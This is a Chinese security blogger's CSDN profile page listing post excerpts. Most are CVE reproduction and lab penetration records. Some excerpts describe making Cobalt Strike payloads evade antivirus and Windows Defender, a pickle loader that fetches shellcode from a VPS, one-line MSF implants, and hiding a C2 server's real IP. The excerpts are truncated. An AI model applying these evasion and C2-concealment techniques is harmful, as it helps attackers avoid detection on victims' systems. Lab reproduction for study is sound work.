自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

daxi0ng的博客

希望能帮到你的忙 :-D

  • 博客(71)
  • 收藏
  • 关注

原创 (工具记录)Log4j2_RCE

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

2023-07-12 20:30:14 408

原创 (记录项)CS上线自动SPAWN两次

1、由于上线之后容易挂,所以改了一个插件实现每个不同IP自动spawn一次,原作者的插件有点问题,只能支持一个IP。ps:cna的sleep编程语言属实是硬写的,不过起码功能实现了。

2022-09-15 16:43:55 663 1

原创 (记录向)Python_MAC加密&C++还原免杀(国内杀软基本通杀)

国内杀软基本通杀

2022-09-02 11:04:42 1149 2

原创 (环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞

0x00 简介Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...

2022-01-25 15:00:26 4121 1

原创 (环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞

0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。0x01 漏洞概述该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。0x02 影响范围Apache Log4j 2.x <= 2.15.0-rc10x02环境搭建1、创建一个新的maven项目,并导入Log4j的依赖包<depe...

2021-12-10 18:46:38 20088 20

原创 (环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现

0x00 简介 Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。0x01 漏洞概述Apache HTTP Server目录遍历漏洞CVE-2021-41773影响版本:Apache HTTP Server 2.4.49该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文...

2021-10-11 15:19:09 1993 1

原创 (复现)CVE-2021-34473 Microsoft Exchange远程代码执行

0x00 简介Microsoft Exchange Server 是微软公司的一套电子邮件服务组件。0x01 漏洞概述2021年8月5日,安全研究员在国外安全会议上公开了CVE-2021-34473 Microsoft Exchange Server 远程代码执行漏洞分析及其POC。攻击者利用该漏洞可绕过相关权限验证,进而配合其他漏洞可执行任意代码,控制Microsoft Exchange Server。漏洞利用使用了以下漏洞:CVE-2021-34473...

2021-08-17 11:53:53 7428

原创 (复现)CVE-2021-21985 Vmware vcenter远程代码执行RCE

0x00 简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。0x01 漏洞概述该漏洞由于vCenter Server默认启用的插件Virtual SAN Heal...

2021-06-30 11:08:29 5215 1

原创 (复现)CVE-2021-21972 Vmware vcenter未授权任意文件上传导致RCE

0x00 简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。0x01 漏洞概述vSphere Client(HTML5)在 vCenter Server 插件中存...

2021-06-29 15:37:30 2063 2

原创 (记录向)VIPER隐藏真实IP域名上线

一、使用VIPER本身的功能可以禁止没有安装证书的IP访问后台,这个官网已经写好了https://www.yuque.com/vipersec/help/xbz4hx二、搭配Cloudflare证书反溯源1、首先创建源服务器证书2、然后设置加密模式为完全3、关闭建议程序4、开启监听...

2021-05-12 11:59:55 1178 3

原创 (环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现

0x00 简介Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。0x01 漏洞概述CVE-2021-26855该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。危害:该漏洞是Exch

2021-03-16 17:31:37 7585 5

原创 (环境搭建+复现)zzzcmsV1.7.5前台RCE

0x00 简介zzzcms是一款PHP语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。0x01 漏洞概述ZZZCMS一处远程代码执行漏洞。由于某些函数存在过滤不严格,攻击者通过构造恶意请求,可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本ZZZCMS 1.7.50x03 环境搭建1、下载ZZZCMS 1.7.5链接:https://pan.baidu.com/s/1uJ81idkgE38317F5jaze

2021-02-02 11:26:42 3137 2

原创 (环境搭建+复现)ZZZCMS模版注入+文件包含getshell

0x00 简介骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。0x01 漏洞概述骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本骑士 CMS < 6.0.480x03 环境搭建1、下载最新版74cms。https://www.74cms.com/download

2021-02-01 14:59:47 2236 1

原创 (记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)

1、首先cs生成一个64位的Python Payload2、截取其中的Payload,并进行base64编码。3、把这一串子base64放到VPS上。并开启web服务。 python3 -m http.server 77774、使用以下脚本。将Python Payload进行反序列化。import pickleimport base64shellcode = """import ctypes,urllib.request,codecs,base64

2021-01-31 11:58:41 1849 4

原创 (环境搭建+复现) JumpServer 远程命令执行漏洞

0x00 简介JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。JumpServer 使用Python / Django 进行开发。0x01 漏洞概述2021年1月15日,JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。建议相关用户尽快采取措施阻止漏洞攻击。

2021-01-20 15:40:45 2307

原创 (非同人文)Cobalt Strike DNS Beacon上线

同人文太多,就写一下我实际操作DNS上线CS的步骤。1、准备我的阿里云域名,设置DNS解析如下。(注意:VPS 的 53 端口一定要开放)第一条 NS 解析是在告诉域名系统,想要知道 ns1.daxi0ng.com 的 IP 地址,就去问 cs.daxi0ng.com 。第二条 A 类解析是在告诉域名系统,cs.daxi0ng.com 的 IP 地址是 47.xx.xx.112。如何验证域名解析设置是否成功?在随便一台电脑上 ping 域名 cs.daxi0ng.com ,若能 p.

2021-01-18 17:25:17 1580

原创 (记录向)C格式shellcode异或加密生成dll,可免杀过 Windows Defender

1、cs生成payload.c2、使用https://github.com/k-fire/shellcode-To-DLL测试用(https://github.com/k-fire/shellcode-To-DLL/blob/master/Release/call_dll.exe)3、按照工具的操作方法生成dll文件。4、将dll文件转化为exe。先保存为bat,然后在转换为exe。...

2021-01-13 11:28:53 1768

原创 (环境搭建+复现)74CMS模版注入+文件包含getshell

0x00 简介骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。0x01 漏洞概述骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本骑士 CMS < 6.0.480x03 环境搭建1、下载最新版74cms。https://www.74cms.com/downlo

2020-12-22 14:10:29 4333 2

原创 ATT&CK 实战 - 红日安全 vulnstack(三)渗透记录

1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128https://xz.aliyun.com/t/6988渗透过程:话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。1、用msf测了一下版本2、跑一下端口3、跑一下目录,发现配置文件的备份文件4、登陆一下数据库5、查看一下密码,加密的,并且没有权限改密文。6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.

2020-12-02 10:35:11 2898 3

原创 (记录向)使用MSF的web_delivery模块上线

前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。目标环境:Centos6.51、选择exploit/multi/script/web_delivery模块2、选择目标系统,我这里选择Linux3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp,4、本机监听一下5、运行,生成一条命令6、目标机器执行上线。7、获取一个友好的交互界面。python -c 'import ...

2020-11-30 15:46:02 1522

原创 ATT&CK 实战 - 红日安全 vulnstack(二)渗透记录

前言:搭建过程可以参考这位师傅的。我就不重复写了。https://www.cnblogs.com/sallyzhang/p/13889411.html三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。默认没有开启Web服务,来到C:\Oracle\Middleware\user_projects\domains\base_domain 路径,运行startWebLogic.

2020-11-30 10:00:27 2421 3

原创 ATT&CK 实战 - 红日安全 vulnstack(一)渗透记录

1、下载好镜像文件。2、直接vmware启动即可。这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)这样win10就可以访问win7,但不能直接访问win08和win2k3。三台靶机的初始密码都是ho

2020-11-26 14:09:21 2471 4

原创 解决笔记本WIFI共享网络给黑群晖

见上文《解决黑群晖切换网络环境后无法访问的问题》问题启始:笔记本A可以访问黑群晖后,想要frp到公网。但是发现笔记本B没有联网。步骤:1、启动笔记本A WIFI的共享功能。2、这时笔记本A的有线网卡网段变为192.168.137.1。3、修改笔记本B的IP为192.168.137.xxx,网关为192.168.137.1。我这里图省事就直接给他弄成DHCP模式了。4、修改笔记本B的DNS为nameserver 114.114.114.1145、现在就可以连通外

2020-11-19 12:02:40 3214

原创 解决黑群晖切换网络环境后无法访问的问题

问题启始:给我的老笔记本搭了一个黑群晖5.2版本,然后为了平时维护,搬到了公司,但是换了网络环境之后,无法访问nas页面,并且公司路由器加了审计。随即想到使用两台笔记本搭建局域网的方式安全地解决。所需工具:1、一台连上wifi的笔记本(称为笔记本A)2、搭建了黑群晖系统的笔记本(称为笔记本B)3、一根网线步骤:1、使用一根网线连接两台电脑的网口。2、进入网络适配器设置页面。3、修改局域网IPV4协议,注意IP地址和网关要与笔记本B设置的IP同C段,例如我的笔记本B,IP为

2020-11-19 10:56:43 21434 1

转载 Wordpress用文件记录访客 IP和访问量

1.记录访问量,显示访客IP[php原码]<?php/*打开文件用于记录访问量,如果文件不存在自动创建*/$counterFile = "counter.txt";$fp = fopen($counterFile,"a+");/*获取IP*/$adress=$_SERVER["REMOTE_ADDR"]; /*统计访问量*/$num = fgets($fp,5);$num += 1;print "您是第 "."$num"." 位访客,"." 您的

2020-11-09 17:10:09 2639 5

原创 (虚假的应急响应)记一次我云服务器中了挖矿病毒kdevtmpfsi的经历

1、话说在我10.16号搭建solr复现CVE-2020-13957的时候,为了图省事直接在我的vps本地搭建了一下。2、今天登陆vps发现,卧槽怎么100%占用,top一下。好家伙,这是个啥。3、我一搜发现是个挖矿病毒。赶紧搜一下怎么解决。删除守护进程ps -aux | grep kinsing删除原进程ps -aux | grep kdevtmpfsi删除掉相关文件cd /tmprm -rf kdevtmpfsirm -rf /var/tmp/ki

2020-10-20 11:51:56 783

原创 (环境搭建+复现)CVE-2020-13957 Apache Solr 未授权上传(RCE)漏洞

0x00 简介Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。0x01 漏洞概述Apache Solr 发布公告,旧版本的 ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)。0x02 影响版本Apache Solr 6.6.0 -6.6.5A

2020-10-16 18:05:31 2485

原创 (环境搭建+复现) Wordpress评论插件wpDiscuz任意文件上传漏洞

0x00 简介wpDiscuz是WordPress评论插件。创新,现代且功能丰富的评论系统,可充实您的网站评论部分。0x01 漏洞概述Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了。这个漏洞将允许未经认证的攻击者在目标站点中上传任意文件,其中也包括PHP文件,该漏洞甚至还允许攻击者在目标站点的服务器中实现远程代码执行。0x02 影响版本wpDiscuz7.0.0– ...

2020-09-25 10:24:55 925

原创 (环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞

0x00 简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案!0x01 漏洞概述安全人员进行调查时,很快发现WordPress插件.

2020-09-25 10:09:15 2247 2

原创 (环境搭建+复现) CVE-2020-0618 SQL Server Reporting Services RCE漏洞

1、【CVE编号】CVE-2020-06182、【漏洞名称】SQL Server Reporting Services RCE漏洞3、【靶标分类】通用组件类型靶标4、【影响版本】SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)SQL Server 2012 for x64-based Systems Service Pa...

2020-04-06 16:16:09 5958 1

原创 (环境搭建+复现) CVE-2020-0674 IE远程代码执行漏洞

1、【CVE编号】CVE-2020-06742、【漏洞名称】IE远程代码执行漏洞3、【靶标分类】Web浏览器类型靶标4、【影响版本】Internet Explorer 10Windows Server 2012Internet Explorer 11Windows 10 Version 1803 for 32-bit SystemsWindows 10 Version 180...

2020-04-05 15:34:38 3079

原创 (环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞

1、【CVE编号】CVE-2019-175712、【漏洞名称】Apache Log4j SocketServer 反序列化漏洞3、【靶标分类】通用漏洞组件类靶标4、【影响版本】Log4j1.2.x<=1.2.175、【漏洞分类】代码执行6、【漏洞等级】高7、【漏洞简介】Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...

2020-04-03 16:52:37 9614 1

原创 (环境搭建+复现)CVE-2019-3398 Confluence路径穿越漏洞

1、【CVE编号】CVE-2019-33982、【漏洞名称】Confluence路径穿越漏洞3、【靶标分类】Web类型类靶标4、【影响版本】2.0.0 <= version < 6.6.136.7.0 <= version < 6.12.46.13.0 <= version < 6.13.46.14.0 <= version < ...

2020-04-02 19:35:33 2501

原创 (环境搭建+复现)CVE-2019-12384 Jackson 远程代码执行漏洞

1、【CVE编号】CVE-2019-123842、【漏洞名称】Jackson 远程命令执行漏洞3、【靶标分类】Web类型类靶标4、【影响版本】Jackson-databind 2.X < 2.9.9.15、【漏洞分类】代码执行6、【漏洞等级】高7、【漏洞简介】由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enab...

2020-03-30 21:37:24 4577 1

原创 (环境搭建+复现) CVE-2019-6341 Drupal XSS漏洞

【CVE编号】CVE-2019-6341【漏洞名称】Drupal XSS漏洞1【靶标分类】Web类型类靶标2【影响版本】在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。3【漏洞分类】XSS4【漏洞等级】中5【漏洞简介】Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...

2020-03-20 23:27:01 2603 2

原创 (环境搭建+复现) CVE-2019-6339 Drupal 远程代码执行漏洞

【CVE编号】CVE-2019-6341【漏洞名称】Drupal XSS漏洞1【靶标分类】Web类型类靶标2【影响版本】在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。3【漏洞分类】XSS4【漏洞等级】中5【漏洞简介】Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...

2020-03-20 22:20:43 3269

原创 (环境搭建+复现)CVE-2019-12409 Apache Solr远程代码执行漏洞

【CVE编号】CVE-2019-12409【漏洞名称】Apache Solr远程代码执行漏洞1【靶标分类】web中间件漏洞2【漏洞分类】命令执行3【漏洞等级】高4【漏洞简介】Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件...

2020-03-16 17:52:15 3633

原创 (环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行

【CNVD编号】CVE-2019-16278【漏洞名称】Nostromo Web服务器的远程命令执行1【靶标分类】web中间件漏洞 2【漏洞分类】命令执行3【漏洞等级】高4【漏洞简介】Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...

2020-03-13 14:10:16 1870

原创 (环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

【CNVD编号】 CVE-2019-9740 【漏洞名称】 Python urllib CRLF 命令注入漏洞 1【靶标分类】 通用漏洞组件 2【漏洞分类】命令注入3【漏洞等级】高4【漏洞简介】Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平...

2020-03-08 17:44:01 2122

原创 渗透测试面试前需要熟悉的基础漏洞原理和防御

Struts漏洞有RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞。SQL注入原理:程序开发过程中没有规范书写sql语句和对特殊字符进行过滤,导致客户端可以通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。类型:UNION query SQL injection(可联合查询注入) Stacked que...

2020-02-08 18:46:28 910

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除